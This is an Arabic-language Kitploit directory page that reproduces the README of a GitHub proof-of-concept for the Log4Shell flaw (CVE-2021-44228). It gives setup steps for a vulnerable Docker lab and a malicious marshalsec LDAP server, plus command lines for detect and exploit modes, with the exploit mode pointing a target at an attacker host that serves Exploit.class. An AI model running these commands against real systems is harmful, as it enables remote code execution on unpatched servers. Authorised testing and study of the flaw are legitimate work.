Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4Shell — إثبات المفهوم لثغرة Log4Shell CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/moften/log4shell
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmoften/log4shell

Log4Shell

إثبات المفهوم لثغرة Log4Shell CVE-2021-44228

عرض المستودع
11منذ 0 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4Shell

(CVE-2021-44228)

☠️ Log4Shell PoC (CVE-2021-44228)

إكسبلويت اختباري للثغرة الحرجة Log4Shell في Apache Log4j ≤ 2.14.1، والذي يتيح تنفيذ كود عن بُعد عبر حقن JNDI.

⚠️ هذا الـ PoC مخصص للأغراض التعليمية والاختبارات الخاضعة للرقابة في البيئات المصرح بها فقط. لا تستخدمه ضد أي نظام دون إذن صريح.


المتطلبات

  • Python 3.x
  • Java 8 أو أحدث
  • marshalsec (لخادم LDAP الخبيث)
  • خادم HTTP (على سبيل المثال، python3 -m http.server)
  • Docker (اختياري للبيئة المعرّضة للثغرات)

بيئة الاختبار المحلية (اختيارية مع Docker)

  1. شغّل التطبيق المعرّض للثغرة:
    root@kitploit:~
    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
      ```
    
    
  2. ادخل إلى: http://localhost:8080
root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

الاستخدام

وضع الكشف السلبي:

root@kitploit:~
python3 main.py -u http://target.com -i burp.collab.net -m detect

الوضع الهجومي (يتطلب ملف Exploit.class على خادم HTTP الخاص بك):

root@kitploit:~
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit

تنزيل الأداة